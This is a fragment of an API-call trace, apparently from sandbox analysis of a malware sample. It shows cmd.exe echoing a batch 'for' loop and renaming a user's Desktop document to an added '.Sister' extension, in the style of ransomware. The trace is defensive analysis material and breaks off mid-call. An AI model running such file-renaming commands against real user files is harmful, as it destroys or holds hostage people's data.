[0185.294] _get_osfhandle (_FileHandle=2) returned 0x54 [0185.294] GetFileType (hFile=0x54) returned 0x2 [0185.294] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0185.294] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0185.393] _get_osfhandle (_FileHandle=2) returned 0x54 [0185.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0185.533] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0185.533] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0185.533] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0185.613] longjmp () [0185.613] ??_V@YAXPEAX@Z () returned 0x1 [0185.613] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="VOv-CkMzVt4YRw.odp", cAlternateFileName="")) returned 1 [0185.613] GetProcessHeap () returned 0x21ed8c70000 [0185.613] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c130, Size=0x47c) returned 0x21ed8d6c130 [0185.614] GetProcessHeap () returned 0x21ed8c70000 [0185.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c130) returned 0x47c [0185.614] GetProcessHeap () returned 0x21ed8c70000 [0185.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956eb50 [0185.614] GetProcessHeap () returned 0x21ed8c70000 [0185.614] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956eb50, Size=0x30) returned 0x21ed956eb50 [0185.614] GetProcessHeap () returned 0x21ed8c70000 [0185.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956eb50) returned 0x30 [0185.614] GetProcessHeap () returned 0x21ed8c70000 [0185.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956eb90 [0185.614] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937a5b0 [0185.616] ??_V@YAXPEAX@Z () returned 0x1 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956eb90, Size=0x1a0) returned 0x21ed956eb90 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956eb90) returned 0x1a0 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956ed40 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956ed40, Size=0x290) returned 0x21ed956ed40 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956ed40) returned 0x290 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956efe0 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956efe0, Size=0x30) returned 0x21ed956efe0 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956efe0) returned 0x30 [0185.616] GetProcessHeap () returned 0x21ed8c70000 [0185.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f020 [0185.616] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0185.617] GetProcessHeap () returned 0x21ed8c70000 [0185.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937ab30 [0185.617] ??_V@YAXPEAX@Z () returned 0x1 [0185.617] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0185.617] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65280 [0185.617] FindClose (in: hFindFile=0x21ed8d65280 | out: hFindFile=0x21ed8d65280) returned 1 [0185.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65280 [0185.617] FindClose (in: hFindFile=0x21ed8d65280 | out: hFindFile=0x21ed8d65280) returned 1 [0185.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9840993c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9840993c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65280 [0185.617] FindClose (in: hFindFile=0x21ed8d65280 | out: hFindFile=0x21ed8d65280) returned 1 [0185.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded, dwReserved0=0x4, dwReserved1=0x7, cFileName="VOv-CkMzVt4YRw.odp", cAlternateFileName="VOV-CK~1.ODP")) returned 0x21ed8d65280 [0185.618] FindClose (in: hFindFile=0x21ed8d65280 | out: hFindFile=0x21ed8d65280) returned 1 [0185.618] _wcsnicmp (_String1="VOV-CK~1.ODP", _String2="VOv-CkMzVt4YRw.odp", _MaxCount=0x12) returned 17 [0185.618] malloc (_Size=0x1ff9c) returned 0x21ed96bfe00 [0185.618] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0185.619] GetProcessHeap () returned 0x21ed8c70000 [0185.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed937b130 [0185.619] ??_V@YAXPEAX@Z () returned 0x1 [0185.619] ??_V@YAXPEAX@Z () returned 0x1 [0185.619] GetProcessHeap () returned 0x21ed8c70000 [0185.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f020, Size=0x1a0) returned 0x21ed956f020 [0185.619] GetProcessHeap () returned 0x21ed8c70000 [0185.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956f020) returned 0x1a0 [0185.620] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0185.620] _get_osfhandle (_FileHandle=1) returned 0x50 [0185.620] GetFileType (hFile=0x50) returned 0x2 [0185.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0185.620] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0185.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0185.690] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0185.766] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0185.766] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0185.766] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0185.766] _get_osfhandle (_FileHandle=1) returned 0x50 [0185.766] GetFileType (hFile=0x50) returned 0x2 [0185.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0185.766] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0185.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0185.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0185.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0185.999] GetFileType (hFile=0x50) returned 0x2 [0185.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0185.999] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0186.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.069] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956eb60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956eb60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0186.235] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"VOv-CkMzVt4YRw.odp\" \"VOv-CkMzVt4YRw.odp.Sister\" ") returned 50 [0186.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.235] GetFileType (hFile=0x50) returned 0x2 [0186.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0186.235] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0186.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.306] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0186.395] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0186.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.395] GetFileType (hFile=0x50) returned 0x2 [0186.395] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0186.395] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0186.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.465] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0186.536] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0186.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.536] GetFileType (hFile=0x50) returned 0x2 [0186.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0186.536] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0186.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.616] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0186.689] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0186.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.690] GetFileType (hFile=0x50) returned 0x2 [0186.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0186.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0186.760] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.760] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0186.836] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0186.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.836] GetFileType (hFile=0x50) returned 0x2 [0186.836] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0186.836] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0186.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0186.925] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0187.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.008] GetFileType (hFile=0x50) returned 0x2 [0187.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0187.008] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0187.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.080] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956eff0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956eff0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0187.237] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"VOv-CkMzVt4YRw.odp.Sister\" \"VOv-CkMzVt4YRw.bat\" ") returned 50 [0187.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.237] GetFileType (hFile=0x50) returned 0x2 [0187.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0187.237] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0187.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.311] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0187.389] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0187.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.389] GetFileType (hFile=0x50) returned 0x2 [0187.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0187.389] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0187.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.466] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0187.544] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0187.622] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0187.622] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0187.622] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0187.622] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0187.622] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0187.622] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0187.622] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0187.622] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0187.622] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0187.622] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0187.622] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0187.622] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0187.622] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0187.622] ??_V@YAXPEAX@Z () returned 0x1 [0187.622] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed937c340 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c340, Size=0x74) returned 0x21ed937c340 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c340) returned 0x74 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed9379420 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed955d220 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d220, Size=0x74) returned 0x21ed955d220 [0187.623] GetProcessHeap () returned 0x21ed8c70000 [0187.623] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d220) returned 0x74 [0187.623] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0187.624] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0187.624] GetProcessHeap () returned 0x21ed8c70000 [0187.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65280 [0187.624] GetProcessHeap () returned 0x21ed8c70000 [0187.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955c7f0 [0187.624] _wcsicmp (_String1="VOv-CkMzVt4YRw.odp", _String2=".") returned 72 [0187.624] _wcsicmp (_String1="VOv-CkMzVt4YRw.odp", _String2="..") returned 72 [0187.624] GetFileAttributesW (lpFileName="VOv-CkMzVt4YRw.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp")) returned 0x20 [0187.624] GetProcessHeap () returned 0x21ed8c70000 [0187.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99b0050 [0187.626] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99b0060 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0187.626] SetErrorMode (uMode=0x0) returned 0x0 [0187.626] SetErrorMode (uMode=0x1) returned 0x0 [0187.626] GetFullPathNameW (in: lpFileName="VOv-CkMzVt4YRw.odp", nBufferLength=0x7fe7, lpBuffer=0x21ed96bfe00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp", lpFilePart=0xa6cf4fd660*="VOv-CkMzVt4YRw.odp") returned 0x2a [0187.626] SetErrorMode (uMode=0x0) returned 0x1 [0187.626] GetProcessHeap () returned 0x21ed8c70000 [0187.626] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955c0a0 [0187.627] _wcsicmp (_String1="VOv-CkMzVt4YRw.odp", _String2=".") returned 72 [0187.627] _wcsicmp (_String1="VOv-CkMzVt4YRw.odp", _String2="..") returned 72 [0187.627] GetFileAttributesW (lpFileName="VOv-CkMzVt4YRw.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp")) returned 0x20 [0187.627] ??_V@YAXPEAX@Z () returned 0x1 [0187.627] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0187.627] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0187.627] malloc (_Size=0xffce) returned 0x21ed96cfde0 [0187.627] ??_V@YAXPEAX@Z () returned 0x21ed96cfde0 [0187.628] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp")) returned 0x20 [0187.628] malloc (_Size=0xffce) returned 0x21ed923fd00 [0187.628] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0187.628] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp", fInfoLevelId=0x1, lpFindFileData=0x21ed955c800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed955c800) returned 0x21ed8d652e0 [0187.628] malloc (_Size=0xffce) returned 0x21ed924fce0 [0187.628] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0187.628] ??_V@YAXPEAX@Z () returned 0x1 [0187.628] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\VOv-CkMzVt4YRw.odp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0187.667] FindNextFileW (in: hFindFile=0x21ed8d652e0, lpFindFileData=0x21ed955c800 | out: lpFindFileData=0x21ed955c800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe895cef0, ftCreationTime.dwHighDateTime=0x1d5ee1a, ftLastAccessTime.dwLowDateTime=0x7dd32d20, ftLastAccessTime.dwHighDateTime=0x1d5e43c, ftLastWriteTime.dwLowDateTime=0x7dd32d20, ftLastWriteTime.dwHighDateTime=0x1d5e43c, nFileSizeHigh=0x0, nFileSizeLow=0xdded, dwReserved0=0x0, dwReserved1=0x0, cFileName="VOv-CkMzVt4YRw.odp", cAlternateFileName="")) returned 0 [0187.668] GetLastError () returned 0x12 [0187.668] FindClose (in: hFindFile=0x21ed8d652e0 | out: hFindFile=0x21ed8d652e0) returned 1 [0187.669] ??_V@YAXPEAX@Z () returned 0x1 [0187.669] ??_V@YAXPEAX@Z () returned 0x1 [0187.669] ??_V@YAXPEAX@Z () returned 0x1 [0187.669] ??_V@YAXPEAX@Z () returned 0x1 [0187.671] GetProcessHeap () returned 0x21ed8c70000 [0187.671] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64b00 [0187.671] GetProcessHeap () returned 0x21ed8c70000 [0187.671] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c957e0, Size=0x16) returned 0x21ed8c95b80 [0187.671] GetProcessHeap () returned 0x21ed8c70000 [0187.671] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95b80) returned 0x16 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937bd80 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bd80, Size=0xb2) returned 0x21ed937bd80 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937bd80) returned 0xb2 [0187.673] GetProcessHeap () returned 0x21ed8c70000 [0187.673] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f1d0 [0187.674] GetProcessHeap () returned 0x21ed8c70000 [0187.674] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f1d0, Size=0x30) returned 0x21ed956f1d0 [0187.674] GetProcessHeap () returned 0x21ed8c70000 [0187.674] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, 